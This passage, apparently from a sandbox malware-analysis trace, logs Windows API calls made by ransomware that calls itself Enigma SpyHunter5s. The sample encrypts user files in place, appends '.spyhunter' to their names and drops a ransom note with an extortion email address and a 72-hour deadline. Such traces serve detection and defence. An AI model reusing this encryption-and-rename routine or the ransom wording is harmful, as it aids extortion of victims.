pbBuffer=0x57ec08 | out: pbBuffer=0x57ec08) returned 1 [0155.968] GetProcessHeap () returned 0x2c0000 [0155.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0155.968] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ec00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ec00*=0x30) returned 1 [0155.968] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0155.969] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0155.969] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0155.969] GetProcessHeap () returned 0x2c0000 [0155.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0155.969] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebc4*=0x2000, lpOverlapped=0x0) returned 1 [0156.007] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.007] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebc4*=0x2000, lpOverlapped=0x0) returned 1 [0156.007] GetProcessHeap () returned 0x2c0000 [0156.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.007] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.007] WriteFile (in: hFile=0x178, lpBuffer=0x57ec04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x57ec04*, lpNumberOfBytesWritten=0x57ebc4*=0x4, lpOverlapped=0x0) returned 1 [0156.007] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebc4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebc4*=0x30, lpOverlapped=0x0) returned 1 [0156.007] CloseHandle (hObject=0x178) returned 1 [0156.007] GetProcessHeap () returned 0x2c0000 [0156.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.007] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.spyhunter") returned 88 [0156.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk.spyhunter")) returned 1 [0156.008] GetProcessHeap () returned 0x2c0000 [0156.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.008] GetProcessHeap () returned 0x2c0000 [0156.008] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.009] GetProcessHeap () returned 0x2c0000 [0156.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e820 | out: hHeap=0x2c0000) returned 1 [0156.009] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ec00 | out: pbBuffer=0x57ec00) returned 1 [0156.010] GetProcessHeap () returned 0x2c0000 [0156.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0156.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ebf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ebf8*=0x30) returned 1 [0156.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.011] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore") returned 108 [0156.011] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0156.011] GetProcessHeap () returned 0x2c0000 [0156.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.011] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebbc*=0x2800, lpOverlapped=0x0) returned 1 [0156.036] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.037] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebbc*=0x2800, lpOverlapped=0x0) returned 1 [0156.037] GetProcessHeap () returned 0x2c0000 [0156.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.037] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.037] WriteFile (in: hFile=0x178, lpBuffer=0x57ebfc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x57ebfc*, lpNumberOfBytesWritten=0x57ebbc*=0x4, lpOverlapped=0x0) returned 1 [0156.038] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebbc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ebbc*=0x30, lpOverlapped=0x0) returned 1 [0156.038] CloseHandle (hObject=0x178) returned 1 [0156.038] GetProcessHeap () returned 0x2c0000 [0156.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.038] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.spyhunter") returned 118 [0156.038] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.spyhunter")) returned 1 [0156.039] GetProcessHeap () returned 0x2c0000 [0156.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.039] GetProcessHeap () returned 0x2c0000 [0156.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0156.039] GetProcessHeap () returned 0x2c0000 [0156.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbc618 | out: hHeap=0x2c0000) returned 1 [0156.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\TaskSchedulerConfig\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\taskschedulerconfig\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.093] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.093] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x57eb33*, lpNumberOfBytesWritten=0x57ec5c*=0x127, lpOverlapped=0x0) returned 1 [0156.094] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.094] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec5c*=0x2ac, lpOverlapped=0x0) returned 1 [0156.094] CloseHandle (hObject=0xa0) returned 1 [0156.094] GetProcessHeap () returned 0x2c0000 [0156.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4c4e0 | out: hHeap=0x2c0000) returned 1 [0156.094] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebf8 | out: pbBuffer=0x57ebf8) returned 1 [0156.094] GetProcessHeap () returned 0x2c0000 [0156.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.094] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebf0*=0x30) returned 1 [0156.095] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml") returned 112 [0156.177] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.xml", lpSrch=".txt") returned 0x0 [0156.177] GetProcessHeap () returned 0x2c0000 [0156.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.177] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ebb4*=0x7ef, lpOverlapped=0x0) returned 1 [0156.178] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff811, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.178] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7ef, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ebb4*=0x7ef, lpOverlapped=0x0) returned 1 [0156.179] GetProcessHeap () returned 0x2c0000 [0156.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.179] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.179] WriteFile (in: hFile=0x178, lpBuffer=0x57ebf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x57ebf4*, lpNumberOfBytesWritten=0x57ebb4*=0x4, lpOverlapped=0x0) returned 1 [0156.179] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57ebb4*=0x30, lpOverlapped=0x0) returned 1 [0156.179] CloseHandle (hObject=0x178) returned 1 [0156.179] GetProcessHeap () returned 0x2c0000 [0156.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.179] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.spyhunter") returned 122 [0156.179] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.xml.spyhunter")) returned 1 [0156.180] GetProcessHeap () returned 0x2c0000 [0156.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.180] GetProcessHeap () returned 0x2c0000 [0156.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.180] GetProcessHeap () returned 0x2c0000 [0156.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47d00 | out: hHeap=0x2c0000) returned 1 [0156.180] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebf8 | out: pbBuffer=0x57ebf8) returned 1 [0156.180] GetProcessHeap () returned 0x2c0000 [0156.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.180] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebf0*=0x30) returned 1 [0156.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.198] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD") returned 132 [0156.198] StrStrW (lpFirst="FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", lpSrch=".txt") returned 0x0 [0156.199] GetProcessHeap () returned 0x2c0000 [0156.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.199] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebb4*=0x2800, lpOverlapped=0x0) returned 1 [0156.200] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.200] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebb4*=0x2800, lpOverlapped=0x0) returned 1 [0156.201] GetProcessHeap () returned 0x2c0000 [0156.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.201] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.201] WriteFile (in: hFile=0x178, lpBuffer=0x57ebf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x57ebf4*, lpNumberOfBytesWritten=0x57ebb4*=0x4, lpOverlapped=0x0) returned 1 [0156.201] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebb4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57ebb4*=0x30, lpOverlapped=0x0) returned 1 [0156.201] CloseHandle (hObject=0x178) returned 1 [0156.201] GetProcessHeap () returned 0x2c0000 [0156.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.201] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.spyhunter") returned 142 [0156.201] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-{48508c83-ec67-468f-aa1f-6f3caf625658}.fsd.spyhunter")) returned 1 [0156.202] GetProcessHeap () returned 0x2c0000 [0156.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.202] GetProcessHeap () returned 0x2c0000 [0156.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.202] GetProcessHeap () returned 0x2c0000 [0156.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc4540 | out: hHeap=0x2c0000) returned 1 [0156.203] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebf0 | out: pbBuffer=0x57ebf0) returned 1 [0156.203] GetProcessHeap () returned 0x2c0000 [0156.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.203] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebe8*=0x30) returned 1 [0156.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.204] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl") returned 140 [0156.204] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0156.204] GetProcessHeap () returned 0x2c0000 [0156.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0156.204] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57ebac*=0x31d, lpOverlapped=0x0) returned 1 [0156.256] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.256] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57ebac*=0x31d, lpOverlapped=0x0) returned 1 [0156.256] GetProcessHeap () returned 0x2c0000 [0156.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0156.256] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.263] WriteFile (in: hFile=0x178, lpBuffer=0x57ebec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x57ebec*, lpNumberOfBytesWritten=0x57ebac*=0x4, lpOverlapped=0x0) returned 1 [0156.263] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ebac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57ebac*=0x30, lpOverlapped=0x0) returned 1 [0156.263] CloseHandle (hObject=0x178) returned 1 [0156.264] GetProcessHeap () returned 0x2c0000 [0156.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.264] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.spyhunter") returned 150 [0156.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\05_Pictures_taken_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\05_pictures_taken_in_the_last_month.wpl.spyhunter")) returned 1 [0156.264] GetProcessHeap () returned 0x2c0000 [0156.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.265] GetProcessHeap () returned 0x2c0000 [0156.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0156.265] GetProcessHeap () returned 0x2c0000 [0156.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff4718 | out: hHeap=0x2c0000) returned 1 [0156.265] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ebf0 | out: pbBuffer=0x57ebf0) returned 1 [0156.265] GetProcessHeap () returned 0x2c0000 [0156.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0156.265] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57ebe8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57ebe8*=0x30) returned 1 [0156.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\Recovery\\Last 